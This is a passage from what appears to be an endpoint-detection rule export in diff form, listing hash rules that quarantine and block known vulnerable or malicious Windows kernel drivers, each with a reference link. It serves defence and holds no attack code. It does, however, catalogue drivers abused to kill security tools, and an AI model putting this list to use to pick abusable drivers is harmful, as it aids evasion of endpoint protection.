+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829934Z",
+ "creation_date": "2026-03-23T11:45:30.829936Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829941Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f6b1aeec2dcdc6bca062aebf012cc897e26615be007059dd098780b85977c91",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02f123f7-7e0c-520c-a29c-c61b3cd2753f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472501Z",
+ "creation_date": "2026-03-23T11:45:30.472505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "73c03b01d5d1eb03ec5cb5a443714b12fa095cc4b09ddc34671a92117ae4bb3a",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02f59a82-cfbf-5a27-9e20-0fb3c73f1515",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147147Z",
+ "creation_date": "2026-03-23T11:45:31.147149Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "637f36fae18a32aac7c284249963f36ac67c049cb557541d3b24eabe2c77c6cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "02fc09c8-a6ee-5c7f-a170-0f8d528f0bb5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147042Z",
+ "creation_date": "2026-03-23T11:45:31.147044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2f91e1d9b4eaaf2037d10896d9a151fa1403c3c3efc03f6863a519b6d0bb4b8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03197381-af7f-5ca5-8b90-947f8dedf145",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983086Z",
+ "creation_date": "2026-03-23T11:45:29.983088Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983094Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3390919bb28d5c36cc348f9ef23be5fa49bfd81263eb7740826e4437cbe904cd",
+ "comment": "Vulnerable Kernel Driver (aka nstrwsk.sys) [https://www.loldrivers.io/drivers/e9b099f6-8a12-46f0-a540-40e88cf0ce17/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "032b3a6e-5b72-588d-8eb6-ff6f05a5e666",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475798Z",
+ "creation_date": "2026-03-23T11:45:30.475801Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475810Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b975bb2aeb265f1e943a9ca501fc76e2b4514e874ca449c0e59fb36bacf17159",
+ "comment": "Malicious Kernel Driver (aka 6771b13a53b9c7449d4891e427735ea2.sys) [https://www.loldrivers.io/drivers/ddca6daf-4932-4e82-ad3c-d92d47632ea4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03451eda-7d3f-5e9c-b42f-189566de53ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460822Z",
+ "creation_date": "2026-03-23T11:45:30.460826Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6a2b1937fa277526a1e0ca9f9b32f85ab9cb7cb1a32250dd9c607e93fc2924f",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03462b63-efc5-5618-a732-13c397e187fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835591Z",
+ "creation_date": "2026-03-23T11:45:30.835593Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835599Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac8b97d5da80ca7b0f325d0b9d28a1a97a21725ae81c8504cc50be50a3a00382",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03488896-4b3f-54c7-861a-da48d7fe4ee6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147376Z",
+ "creation_date": "2026-03-23T11:45:31.147378Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f5bdeecabdf1c33c6f1263bc9a2f6e816eefb117b4d19dabd86743398abbce9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0360a8bb-1dd0-5e2f-9658-aebdb564b83f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476280Z",
+ "creation_date": "2026-03-23T11:45:30.476283Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476291Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "834a3d755b5ae798561f8e5fbb18cf28dfcae7a111dc6a03967888e9d10f6d78",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0377aacc-9f0a-5094-a490-ef43f4ae4061",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499243Z",
+ "creation_date": "2026-03-23T11:45:31.499246Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499254Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a9a17986c8d36a2244538222be04858b5a3f23eef5f6484b6923e225874d564",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "037e14f8-b96f-50a6-9a57-2a4b0a01ef90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452882Z",
+ "creation_date": "2026-03-23T11:45:30.452886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec1307356828426d60eab78ffb5fc48a06a389dea6e7cc13621f1fa82858a613",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0398198d-ce88-5c5e-8b75-41a6e6640cbc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977018Z",
+ "creation_date": "2026-03-23T11:45:29.977020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "689995fe5db058b23ce5f421e9bc256377f40ada2b74c9c50672a54d1b98834e",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "039b36fd-622b-5014-9afa-ca4ebb77f3d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458521Z",
+ "creation_date": "2026-03-23T11:45:30.458524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "234fc829bfd4d8d5dca351be176f5a06cb29bbfd5632a93cc218936d32a44851",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03b3f3a8-9979-56fb-b988-58051e45ea43",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613154Z",
+ "creation_date": "2026-03-23T11:45:29.613156Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613161Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f75d91844b0c162eeb24d14bcf63b7f230e111daa7b0a26eaa489eeb22d9057",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03bb5dd9-6232-5b30-baf4-6942e653836f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617609Z",
+ "creation_date": "2026-03-23T11:45:29.617611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617616Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48d67eacca3ff6a4310f3164988b832ba7142021aec0d7a1b988be240b7ad170",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03bb70a2-e818-51b1-a84c-69305b28b316",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478104Z",
+ "creation_date": "2026-03-23T11:45:30.478107Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478116Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "992eb531739029456311043f99fa48ac896a59e70edc48093facaf3479e0c3f0",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03bb82b7-08e3-52b2-aa32-b2cbc91aeeac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808239Z",
+ "creation_date": "2026-03-23T11:45:31.808242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808251Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61939a658ad0d4d93fde596a40ef9e81e4b2d3833ca614d6216e8445741aef7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03dde572-6100-504c-a8c7-9dce7a9d4f53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479583Z",
+ "creation_date": "2026-03-23T11:45:30.479585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479591Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33c6c622464f80a8d8017a03ff3aa196840da8bb03bfb5212b51612b5cf953dc",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO64I.SYS) [https://www.loldrivers.io/drivers/080a834f-3e19-4cae-b940-a4ecf901db28/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03e7d81d-3ba9-5ba2-a30b-d225d2508d6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978826Z",
+ "creation_date": "2026-03-23T11:45:29.978828Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c",
+ "comment": "Vulnerable Kernel Driver (aka speedfan.sys) [https://www.loldrivers.io/drivers/137daca4-0d7b-48aa-8574-f7eb6ad02526/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03f12abe-2f1e-5835-8784-c77cdb8167a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143826Z",
+ "creation_date": "2026-03-23T11:45:31.143828Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2256ff8815e0f956ecda7946b37aa28816f6ab6ef91db426de4e49055c0f3741",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "03f65d58-acc5-5747-9a2b-efc1f77662c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821449Z",
+ "creation_date": "2026-03-23T11:45:31.821451Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e19076fa8c2424904b383c36c73eadfb5dbbde610cbaef094e4928036ff8b39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0403f78e-afc0-56b5-9a87-9ddd8bead19f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817462Z",
+ "creation_date": "2026-03-23T11:45:31.817464Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817470Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
